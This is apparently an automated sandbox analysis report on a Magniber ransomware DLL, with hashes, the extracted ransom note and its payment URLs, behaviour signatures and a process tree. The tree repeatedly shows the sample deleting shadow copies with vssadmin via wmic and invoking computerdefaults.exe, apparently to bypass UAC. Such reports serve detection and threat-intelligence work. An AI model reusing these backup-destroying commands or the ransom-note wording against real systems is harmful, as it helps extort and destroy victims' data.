Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2023 14:23

General

  • Target

    009aaaf3b4f3a34b662cb9d27fb4409d.dll

  • Size

    39KB

  • MD5

    009aaaf3b4f3a34b662cb9d27fb4409d

  • SHA1

    ac5bfd05ec67090c4f7180519628328e29f3f39a

  • SHA256

    2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017

  • SHA512

    50973c3ac2849c8664d74d7efc07fcb0a43260d05030fa7772f135cf716357d522309e70d7ba4ee51cd44ea7a3c711b321221b33ab192ccce6ee71dceb527aea

  • SSDEEP

    768:QJvL0rvzhHm06R0Zd+01mV0kgMazfo269xnWf77/KrkVPe4kQKNNJ7kIGsp9C88K:q0rvzhV6Ra+01Y0dMio39xWDrKrkVm4i

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://24e870181848369088sgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx http://24e870181848369088sgokwyejx.bearsat.space/sgokwyejx http://24e870181848369088sgokwyejx.mixedon.xyz/sgokwyejx http://24e870181848369088sgokwyejx.spiteor.space/sgokwyejx Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://24e870181848369088sgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx

http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx

http://24e870181848369088sgokwyejx.bearsat.space/sgokwyejx

http://24e870181848369088sgokwyejx.mixedon.xyz/sgokwyejx

http://24e870181848369088sgokwyejx.spiteor.space/sgokwyejx

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 20 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (80) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 20 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\009aaaf3b4f3a34b662cb9d27fb4409d.dll,#1
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4784
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    PID:3492
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
        PID:1868
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        2⤵
          PID:2344
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            3⤵
              PID:4560
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            2⤵
              PID:4072
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                3⤵
                  PID:4416
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              1⤵
              • Modifies registry class
              PID:2604
              • C:\Windows\system32\wbem\wmic.exe
                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                2⤵
                  PID:2748
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                  2⤵
                    PID:864
                    • C:\Windows\system32\wbem\WMIC.exe
                      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                      3⤵
                        PID:4212
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                      2⤵
                        PID:2344
                        • C:\Windows\system32\wbem\WMIC.exe
                          C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                          3⤵
                            PID:2348
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                        1⤵
                        • Modifies registry class
                        PID:2464
                        • C:\Windows\system32\wbem\wmic.exe
                          C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                          2⤵
                            PID:1436
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                            2⤵
                              PID:2596
                              • C:\Windows\system32\wbem\WMIC.exe
                                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                3⤵
                                  PID:3628
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                2⤵
                                  PID:744
                                  • C:\Windows\system32\wbem\WMIC.exe
                                    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                    3⤵
                                      PID:2344
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  1⤵
                                  • Modifies registry class
                                  • Suspicious use of WriteProcessMemory
                                  PID:2452
                                  • C:\Windows\system32\notepad.exe
                                    notepad.exe C:\Users\Public\readme.txt
                                    2⤵
                                    • Opens file in notepad (likely ransom note)
                                    PID:4940
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c "start http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx^&2^&25276002^&80^&357^&2219041"
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2340
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx&2&25276002&80&357&2219041
                                      3⤵
                                      • Enumerates system info in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of WriteProcessMemory
                                      PID:4452
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcf89c46f8,0x7ffcf89c4708,0x7ffcf89c4718
                                        4⤵
                                          PID:4520
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
                                          4⤵
                                            PID:4720
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
                                            4⤵
                                              PID:2816
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                              4⤵
                                                PID:2504
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4676
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3020
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
                                                4⤵
                                                  PID:3720
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
                                                  4⤵
                                                    PID:468
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                                                    4⤵
                                                      PID:4376
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:968
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
                                                      4⤵
                                                        PID:4416
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
                                                        4⤵
                                                          PID:1304
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                                                          4⤵
                                                            PID:4764
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
                                                            4⤵
                                                              PID:3428
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1864 /prefetch:1
                                                              4⤵
                                                                PID:2296
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
                                                                4⤵
                                                                  PID:4268
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                              2⤵
                                                                PID:4676
                                                                • C:\Windows\system32\wbem\WMIC.exe
                                                                  C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3904
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2172
                                                                • C:\Windows\system32\wbem\WMIC.exe
                                                                  C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3888
                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                2⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1748
                                                            • C:\Windows\system32\vssadmin.exe
                                                              vssadmin.exe Delete Shadows /all /quiet
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Interacts with shadow copies
                                                              PID:5084
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /c computerdefaults.exe
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4444
                                                              • C:\Windows\system32\ComputerDefaults.exe
                                                                computerdefaults.exe
                                                                2⤵
                                                                  PID:1596
                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                    3⤵
                                                                      PID:4484
                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                  computerdefaults.exe
                                                                  1⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3104
                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                    2⤵
                                                                      PID:4124
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /c computerdefaults.exe
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3920
                                                                  • C:\Windows\system32\vssvc.exe
                                                                    C:\Windows\system32\vssvc.exe
                                                                    1⤵
                                                                      PID:4936
                                                                    • C:\Windows\system32\vssadmin.exe
                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                      1⤵
                                                                      • Process spawned unexpected child process
                                                                      • Interacts with shadow copies
                                                                      PID:3552
                                                                    • C:\Windows\system32\vssadmin.exe
                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                      1⤵
                                                                      • Process spawned unexpected child process
                                                                      • Interacts with shadow copies
                                                                      PID:1424
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:4348
                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                        1⤵
                                                                          PID:3696
                                                                        • C:\Windows\system32\BackgroundTaskHost.exe
                                                                          "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                                                                          1⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1596
                                                                        • C:\Windows\system32\vssadmin.exe
                                                                          vssadmin.exe Delete Shadows /all /quiet
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Interacts with shadow copies
                                                                          PID:2140
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c computerdefaults.exe
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          PID:1424
                                                                          • C:\Windows\system32\ComputerDefaults.exe
                                                                            computerdefaults.exe
                                                                            2⤵
                                                                              PID:3228
                                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                3⤵
                                                                                  PID:4488
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd /c computerdefaults.exe
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              PID:4124
                                                                              • C:\Windows\system32\ComputerDefaults.exe
                                                                                computerdefaults.exe
                                                                                2⤵
                                                                                  PID:2280
                                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                    3⤵
                                                                                      PID:4972
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                  1⤵
                                                                                  • Process spawned unexpected child process
                                                                                  • Interacts with shadow copies
                                                                                  PID:1596
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                  1⤵
                                                                                  • Process spawned unexpected child process
                                                                                  • Interacts with shadow copies
                                                                                  PID:1448
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                  1⤵
                                                                                  • Process spawned unexpected child process
                                                                                  • Interacts with shadow copies
                                                                                  PID:4424
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd /c computerdefaults.exe
                                                                                  1⤵
                                                                                  • Process spawned unexpected child process
                                                                                  PID:1368
                                                                                  • C:\Windows\system32\ComputerDefaults.exe
                                                                                    computerdefaults.exe
                                                                                    2⤵
                                                                                      PID:2176
                                                                                      • C:\Windows\system32\wbem\wmic.exe
                                                                                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                        3⤵
                                                                                          PID:4728
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      cmd /c computerdefaults.exe
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      PID:4372
                                                                                      • C:\Windows\system32\ComputerDefaults.exe
                                                                                        computerdefaults.exe
                                                                                        2⤵
                                                                                          PID:4032
                                                                                          • C:\Windows\system32\wbem\wmic.exe
                                                                                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                            3⤵
                                                                                              PID:1552
                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                          vssadmin.exe Delete Shadows /all /quiet
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          • Interacts with shadow copies
                                                                                          PID:3068
                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                          vssadmin.exe Delete Shadows /all /quiet
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          • Interacts with shadow copies
                                                                                          PID:640
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd /c computerdefaults.exe
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          PID:4964
                                                                                          • C:\Windows\system32\ComputerDefaults.exe
                                                                                            computerdefaults.exe
                                                                                            2⤵
                                                                                              PID:4240
                                                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                3⤵
                                                                                                  PID:3352
                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                              vssadmin.exe Delete Shadows /all /quiet
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              • Interacts with shadow copies
                                                                                              PID:4564
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd /c computerdefaults.exe
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              PID:2384
                                                                                              • C:\Windows\system32\ComputerDefaults.exe
                                                                                                computerdefaults.exe
                                                                                                2⤵
                                                                                                  PID:4876
                                                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                    3⤵
                                                                                                      PID:3696
                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:4500
                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:4632

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                  Filesize

                                                                                                  152B

                                                                                                  MD5

                                                                                                  1386433ecc349475d39fb1e4f9e149a0

                                                                                                  SHA1

                                                                                                  f04f71ac77cb30f1d04fd16d42852322a8b2680f

                                                                                                  SHA256

                                                                                                  a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc

                                                                                                  SHA512

                                                                                                  fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  111B

                                                                                                  MD5

                                                                                                  285252a2f6327d41eab203dc2f402c67

                                                                                                  SHA1

                                                                                                  acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                  SHA256

                                                                                                  5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                  SHA512

                                                                                                  11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  ace01a16bd10db0d3b17109d16c1f885

                                                                                                  SHA1

                                                                                                  78eae62efe0f45cc088168927a2f8493365a9ae5

                                                                                                  SHA256

                                                                                                  b9afb85de285de53209fbcd183398ea5b07704a3311cecd981b1d90705a64f36

                                                                                                  SHA512

                                                                                                  170a44aa2d7f2a8b4035d041a5223c4d8d129d7eee4f32172f8b4fa15020fc5b33f22698d0161968dd3a20ecdb6582c66cc27831e42228702065a84532357a37

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  c8c23cf9be868b6967ee8ef06375138c

                                                                                                  SHA1

                                                                                                  31ccb2d79cbcccbabb7b54746a0556612db1730c

                                                                                                  SHA256

                                                                                                  fb2cd579ca07c18438fee1e079bfa0185cb3ffa22b78f79d51e3b7bda93b593d

                                                                                                  SHA512

                                                                                                  16e4dc69b243b452c3f24840a26b2cb8892292b0eb82a51eab719725d4a81fd974fca426a35b628e3678f207082453192b199a3360101dfd656385b298cd628d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                  Filesize

                                                                                                  24KB

                                                                                                  MD5

                                                                                                  e664066e3aa135f185ed1c194b9fa1f8

                                                                                                  SHA1

                                                                                                  358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5

                                                                                                  SHA256

                                                                                                  86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617

                                                                                                  SHA512

                                                                                                  58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                  Filesize

                                                                                                  16B

                                                                                                  MD5

                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                  SHA1

                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                  SHA256

                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                  SHA512

                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  9f8ae3a3f734b3e8863b4ffc197482f0

                                                                                                  SHA1

                                                                                                  136be55751f53a415f516bba7b586a1a119cc3f5

                                                                                                  SHA256

                                                                                                  eda8c54629a1de49b46420d8f2e1dd5ee6f1af4b2758433ddbb30d501681e1a9

                                                                                                  SHA512

                                                                                                  c2de4f9a8b2048789a789eb25c61504ef5154ae80ff37a85bcf5f0558cc59494447f255a7e521e7286c91aa5517d8be96051f85621a34dd303771ed2b04d08b8

                                                                                                • C:\Users\Admin\Pictures\readme.txt

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  5ccd842772aaca1dad2fece3b28bb6d3

